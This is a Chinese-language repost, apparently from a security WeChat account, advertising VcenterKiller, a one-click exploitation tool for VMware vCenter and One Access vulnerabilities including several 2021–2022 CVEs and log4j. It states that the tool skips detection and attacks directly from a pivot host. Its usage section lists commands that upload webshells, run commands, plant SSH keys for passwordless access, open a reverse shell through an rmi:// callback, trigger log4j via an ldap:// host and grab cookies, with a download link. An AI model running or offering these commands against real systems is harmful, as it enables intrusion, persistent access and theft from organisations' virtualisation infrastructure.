小域控Vcenter漏洞一键利用工具VcenterKiller

admin 2023年11月14日00:30:02评论57 views字数 1027阅读3分25秒阅读模式
 

安全工具

01

工具介绍

一般Vcenter都放在内网,并且漏洞特征也都是烂大街,像什么fscan啦一扫就出来了,那么VcenterKiller就不是用来检测目标是否存在漏洞的,而是直接尝试利用,一般通过CS/MSF在跳板上来执行,所以去掉了其余花里胡哨的输出。

 

一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972/31656以及log4j,提供一键上传webshell,命令执行或者上传公钥使用SSH免密连接。

02

工具使用

go build -o main.exe
./main.exe -u https://192.168.1.1 -m 21985 -c whoami./main.exe -u https://192.168.1.1 -m 22005 -f test.jsp./main.exe -u https://192.168.1.1 -m 21972 -f test.jsp./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh //传公钥./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx./main.exe -u https://192.168.1.1 -m log4center -t scan // scan log4j./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami //也可以不指定ldap服务./main.exe -u https://xx.xx.com -m 22954 whoami./main.exe -u https://xx.xx.com -m 22972 //get cookie./main.exe -u https://xx.xx.com -m 31656 //If CVE-2022-22972不能用就换CVE-2022-31656
03

工具下载

 

https://github.com/Schira4396/VcenterKiller/releases/tag/v1.3.7

 

 

原文始发于微信公众号(夜组安全):小域控Vcenter漏洞一键利用工具VcenterKiller

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月14日00:30:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   小域控Vcenter漏洞一键利用工具VcenterKillerhttps://cn-sec.com/archives/2200719.html

发表评论

匿名网友 填写信息